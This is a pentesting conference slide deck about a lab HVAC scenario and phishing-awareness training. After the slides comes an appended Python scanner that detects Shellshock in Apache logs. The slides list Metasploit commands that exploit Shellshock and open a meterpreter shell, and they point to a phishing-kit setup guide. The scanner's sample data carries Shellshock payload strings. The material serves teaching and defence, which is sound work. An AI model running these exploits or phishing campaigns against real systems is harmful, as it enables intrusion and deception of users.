ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK

Presenter: Robbie Corley (Robbie.Corley@KCTCS.EDU)
Organization: KCTCS
Senior Information Security Analyst

ABOUT ME

Personal Life / Interests
• Married
• Bachelor’s in Music Business???
• Favorite Show: Seinfeld
• Favorite Movie(s): Lord of the Rings / Hobbit Trilogy
• Favorite Aspects of IT Security:
  • Reverse Engineering / Studying Shellcode
  • Finding and Exploiting Software Vulnerabilities

LET’S TALK ABOUT PENTESTING

What is a pentest?
• A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan.

How does it work?
• You are the attacker:
  • You will use exploits custom-tailored to target the specific vulnerabilities flagged by your previous vulnerability scan

LET’S TALK ABOUT PENTESTING

Some history on Pentesting…
• Pentesting originally required manually compiling each individual exploit to test a vulnerability; the exploits were usually coded in different programming languages and were specific to OS builds (XP SP1, XP SP2, etc.)

What’s the advantage over a Vulnerability Scan, and why conduct one?
• A Vulnerability Scan merely lays out the foundation for your network risk assessment
• A Pentest helps you fortify your network by discovering and patching security holes before the attackers do, and keeps your auditors happy, which also keeps your boss happy
• Pentesting “weeds out” false positives from a Vulnerability Scan while also validating the vulnerabilities that are real

CONDUCTING YOUR FIRST PENTEST

• Our Goal: To scan and validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest
• Recommended Vendor: Rapid7 (approved PCI scan vendor, an added plus)
  • Other recommendations: Tenable Nessus
  • Open Source: OpenVAS
• Why Rapid7?
  • Exploits are pre-compiled and you do not need to go online to search for them.
    Readily available, built into the software
  • Scanner and Pentesting software both free to try
• Software Resources Used:
  • Nexpose Vulnerability Scan Solution
  • Metasploit Pentesting Solution

HVAC SYSTEM SCAN & PENTEST SIMULATION

• Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network
• Attack Vectors used: Client Side and Web
• A Blind Scan?
  • A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario
• HVAC Network Layout:
  • HVAC A: Windows XP server for the HVAC software: 192.168.56.101
  • HVAC B: Linux Web Server for HVAC Web Services: 192.168.56.102

HVAC SERVER A: SCAN SIMULATION
Vulnerability Scan Results using HVAC A (IP: 192.168.56.101, OS: Windows XP, HVAC CONSOLE SERVER)

HVAC SERVER A: PENTEST SIMULATION
Pentest Live Demo using HVAC A (IP: 192.168.56.101, OS: Windows XP, HVAC CONSOLE SERVER)

HVAC SERVER B: SCAN SIMULATION
Vulnerability Scan Results using HVAC B (IP: 192.168.56.102, OS: Linux, HVAC WEB SERVER)
Shellshock!!!!!!

HVAC SERVER B: PENTEST SIMULATION
Pentest Live Demo using HVAC B (IP: 192.168.56.102, OS: Linux, HVAC WEB SERVER)

PENTEST SHELL COMMANDS USED

Commands used, for future reference. To pull up the web console, type Alt + Tilde (“~”), then:
• “use exploit/multi/http/apache_mod_cgi_bash_env_exec”
• “set RHOST 192.168.56.102” (our victim box IP address)
• “set TARGETURI /cgi-bin/status” (path to the vulnerable CGI script)
• “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module)
• “run”
Once in the compromised victim machine’s session, you can open a shell by simply typing “shell”. You will then be greeted with a Linux shell.

USER AWARENESS TRAINING: PENTESTING USING SOCIAL ENGINEERING MODULES

• Why have User Awareness Training?
  • Users can be more mindful of simple operations that can effectively help keep their documents and data safe
  • We simply cannot monitor all of our users’ actions
  • Hackers recognize well-structured network security and seek out easier pathways of entry, e.g. a phishing email directed to an unsuspecting, untrained user
  • On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure

USER AWARENESS TRAINING: PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES

• How does it work?
  • Phishing Modules use pre-made email templates that resemble common phishing emails in the wild
  • Emails can be tailored to redirect users to informative phishing awareness videos when the user interacts with a phishing email
• What tools do I need?
  • Easiest solution and what we will be using: SPTOOLKIT
  • SPTOOLKIT is open source and requires little effort to set up
  • Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a Pro license

USER AWARENESS TRAINING: PHISHING AROUND WITH SPTOOLKIT

• Demo time!
• Link: https://github.com/sptoolkit/sptoolkit
• Requirements:
  • SMTP server
  • Any Linux OS box with Apache and MySQL installed
  • Recommended approach: Install Kali Linux, which has Apache and MySQL installed and enabled by default: http://www.kali.org/downloads/
• Commands to start MySQL and Apache:
  • service apache2 start
  • service mysql start

THAT’S ALL FOLKS

This presentation and its supplemental video and software content can be downloaded by using the following link: http://tinyurl.com/l46flvo (secure Google Drive repository)

Links to resources outside of this repository:
• SPTOOLKIT Setup Guide: http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup
• www.rapid7.com -> download the Community edition of Metasploit and Nexpose
• http://www.kali.org/downloads/ -> Kali Linux, to be used as a pentesting environment and for the SPTOOLKIT Social Engineering Module

Want to chat with me outside of this conference about more IT Security topics? Shoot me an email at: Robbie.Corley@kctcs.edu

QUESTIONS???
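As an added defender-side example for the HVAC B Shellshock demo (this code is not from the presentation, Rapid7 or Metasploit), the Python scanner below parses Apache access-log lines and flags requests that carry the bash function-definition marker the apache_mod_cgi_bash_env_exec module relies on, rating hits against /cgi-bin/ paths higher. The log lines, timestamps and the 192.168.56.1 source address are constructed sample data, not captured from the demo.

```python
import re

# Constructed Apache "combined" access-log lines for the HVAC B scenario (sample data, not from the demo).
SAMPLE_LOG = """\
192.168.56.1 - - [22/Sep/2014:10:15:01 -0400] "GET /cgi-bin/status HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.56.1 - - [22/Sep/2014:10:15:07 -0400] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; echo test"
192.168.56.1 - - [22/Sep/2014:10:15:09 -0400] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :;}; echo test" "curl/7.38.0"
192.168.56.1 - - [22/Sep/2014:10:15:12 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "() { :;}; echo test"
"""
# Combined format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock marker: a bash function definition "() {" in a value that mod_cgi
# exports into the script's environment (User-Agent, Referer, request line).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the first field carrying the Shellshock marker, or None if the entry is clean."""
    for field in ("agent", "referer", "request"):
        if SHELLSHOCK_RE.search(entry[field]):
            return field
    return None


def scan_log(text):
    """Return one alert dict per suspicious line; severity is 'high' when a CGI path is targeted."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        field = classify(entry) if entry else None
        if field is None:
            continue
        parts = entry["request"].split()
        path = parts[1] if len(parts) >= 2 else entry["request"]
        alerts.append({"host": entry["host"], "time": entry["time"], "path": path,
                       "field": field, "status": entry["status"],
                       "severity": "high" if path.startswith("/cgi-bin/") else "medium"})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['time']} {a['host']} {a['path']} via {a['field']} (HTTP {a['status']})")
```

Run against a real access log (with the combined LogFormat) the same function gives a quick after-the-fact check of whether a CGI host like HVAC B was probed before it was patched.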